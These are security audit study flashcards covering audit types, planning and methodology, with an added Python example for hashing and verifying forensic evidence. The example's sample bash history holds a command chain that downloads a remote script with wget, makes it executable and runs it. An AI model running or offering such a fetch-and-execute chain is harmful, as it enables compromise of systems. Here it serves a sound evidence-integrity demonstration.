04.Information Security Control Testing and Evaluation (311) Flashcards
Control Monitoring
Controls need to be designed so that monitoring can take place.
311
Control Auditing
Reviews and audits are an essential function for security managers to determine whether security safeguards are in place and working properly.
311
Security Review and Security Audit
A security review is a less formal and less rigorous examination of one or more controls, processes, or systems.
A security audit is a more formal, methodical, and rigorous examination of one or more controls, processes, or systems.
Security Review and Security Audit
A security review is typically carried out internally, by the control owner.
A security audit is typically carried out by a separate, independent party.
312
Security Audit
Systematic and repeatable process
Competent and independent professional evaluation
2 parties - auditor and auditee
2 types - internal and external
312
Audit Techniques
An audit is a planned event that requires formal planning to achieve its objectives.
313
Types of planning required:
- Purpose
- Scope
- Risk Analysis
- Audit Procedures
- Resources
- Schedule
Audit Purpose
The auditor and auditee must establish the purpose of the audit, for example validating regulatory compliance.
313
Audit Scope
The auditor and auditee must establish the scope. This could include specific systems or a specific time frame (start to finish).
313
Audit - Risk Analysis
An auditor needs to know the levels of risk associated with the domain being audited to determine where the greatest amount of attention and resources is required.
313
Audit - Audit Procedures
The purpose and scope of an audit will help define the relevant procedures used. Specific rules on sample sizes and techniques may be stipulated if, for example, the audit is a compliance audit.
313
Audit - Resources
Determine what resources are needed and available for the audit.
The auditee may have a limited budget for an external audit.
Specialist tools may be required to run sufficient analysis.
The auditor needs to determine the number of person-hours and the skill set that will be required.
314
Audit - Schedule
The schedule needs to include enough time for interviews, data collection, analysis, and report generation.
314
Audit Objectives
Audit objectives are the specific goals of an audit, typically to determine whether controls exist and whether they are effective.
314
Types of Audit
The scope, purpose, and objectives of an audit will help to determine the type of audit to be performed.
Auditors must understand the type of audit required so they know which techniques and procedures to deploy.
314
Audit Type - Operational Audit
Examination of controls (IT, Security, Business), to determine control existence and effectiveness
315
Audit Type - Financial Audit
Examination of accounting system, including accounting department processes and procedures
315
Audit Type - Integrated Audit
Combined operational and financial audit. Offers the auditor a complete understanding of the integrity of the entire environment.
315
Audit Type - IS Audit
Detailed examination of most/all information systems department operations.
Determines whether IT governance is aligned with the organisation's objectives and goals.
315
Audit Type - Administrative Audit
Examination of operational efficiency within a segment of the organisation
315
Audit Type - Compliance Audit
Determines the level and degree of compliance to law, regulation, standard, internal control, or legal contract.
Some laws and standards require the audit to be performed by approved and licensed external auditors.
315
Audit Type - Forensic Audit
Performed by a forensic specialist to support an anticipated or active legal proceeding, or a security incident investigation.
Strict procedures must be followed to preserve evidence and avoid it being ruled inadmissible due to tampering.
315
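The evidence-preservation requirement on the forensic audit card above, shown as an added example that is not part of the original flashcards: a minimal hash-on-collection manifest in Python. Each artefact is hashed (SHA-256) at collection time, the manifest records who collected what and when, and the manifest itself carries a digest so that later edits to the record are detectable. The case ID, collector name and log lines are constructed for illustration; a real investigation would add write-blocking, signed timestamps and a formal chain-of-custody form on top of this.

```python
"""Hash-on-collection evidence manifest, with later integrity verification.

Added illustration for the forensic audit card; not taken from the source text.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

# Constructed sample evidence (not real log data); used only by demo() below.
SAMPLE_EVIDENCE = {
    "auth.log": (
        "Mar 10 09:12:01 host sshd[2211]: Failed password for root from 203.0.113.7 port 52211 ssh2\n"
        "Mar 10 09:12:05 host sshd[2211]: Accepted password for admin from 203.0.113.7 port 52211 ssh2\n"
    ),
    "bash_history.txt": "wget http://203.0.113.7/x.sh\nchmod +x x.sh\n./x.sh\n",
}


def sha256_file(path, chunk_size=1 << 20):
    """Stream a file through SHA-256 so large images do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(paths, case_id, collector):
    """Record path, size and digest of every artefact, plus who/when it was taken."""
    items = [
        {"path": p, "size": os.stat(p).st_size, "sha256": sha256_file(p)}
        for p in sorted(paths)
    ]
    manifest = {
        "case_id": case_id,            # hypothetical identifier, supplied by caller
        "collected_by": collector,     # hypothetical examiner name, supplied by caller
        "collected_at": datetime.now(timezone.utc).isoformat(),
        "items": items,
    }
    # Digest of the canonical record so that editing the manifest itself is detectable.
    manifest["manifest_sha256"] = manifest_digest(manifest)
    return manifest


def manifest_digest(manifest):
    """Canonical JSON (sorted keys, no whitespace) of everything except the self-digest."""
    body = {k: v for k, v in manifest.items() if k != "manifest_sha256"}
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(canonical).hexdigest()


def verify_manifest(manifest):
    """Return {path: 'ok' | 'modified' | 'missing'}; raise if the manifest record was altered."""
    if manifest_digest(manifest) != manifest["manifest_sha256"]:
        raise ValueError("manifest record altered; chain of custody broken")
    results = {}
    for item in manifest["items"]:
        p = item["path"]
        if not os.path.exists(p):
            results[p] = "missing"
        elif sha256_file(p) != item["sha256"]:
            results[p] = "modified"
        else:
            results[p] = "ok"
    return results


def demo():
    """Collect, verify, then tamper and verify again. Returns the three outcomes."""
    with tempfile.TemporaryDirectory() as d:
        paths = []
        for name, content in SAMPLE_EVIDENCE.items():
            p = os.path.join(d, name)
            with open(p, "w") as f:
                f.write(content)
            paths.append(p)
        manifest = build_manifest(paths, "CASE-2024-001", "j.smith")  # hypothetical values
        before = sorted(verify_manifest(manifest).values())

        # Simulate post-collection tampering: one file appended to, one deleted.
        with open(paths[0], "a") as f:
            f.write("Mar 10 09:12:09 host sshd[2211]: pam_unix(sshd:session): session opened\n")
        os.remove(paths[1])
        after = sorted(verify_manifest(manifest).values())

        # Simulate someone editing the custody record itself.
        forged = dict(manifest, collected_by="someone_else")
        try:
            verify_manifest(forged)
            record_alarm = False
        except ValueError:
            record_alarm = True
        return before, after, record_alarm


if __name__ == "__main__":
    print(demo())
```

The digest of the manifest only proves the record has not changed since it was written; it does not prove who wrote it. For admissibility the manifest digest would normally be signed or written to a timestamped, append-only store by the examiner at collection time.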
Audit Type - Service Provider Audit
Third-party service organisations undergo external audits to increase customer confidence in the integrity and security of their services.
316
Audit Type - Pre-Audit
An examination of business processes in anticipation of an upcoming audit, the results of which are used to implement improvements before the real audit takes place.
316
Audit Methodology
An audit methodology is the set of audit procedures used to accomplish a set of audit objectives.
Typical audit methodology phases:
Audit Subject
Determine which process, information system, or domain is being audited.
Audit Objective
Identify the purpose of the audit.
Type of Audit
Determine the type of audit, e.g. operational, financial, integrated, etc.
Audit Scope
Identify the business process, department, or application that is subject to the audit.
Pre-Audit Planning
The auditor needs certain information from the auditee, so plans how it will be obtained: the techniques to use, the physical locations to visit, etc.
316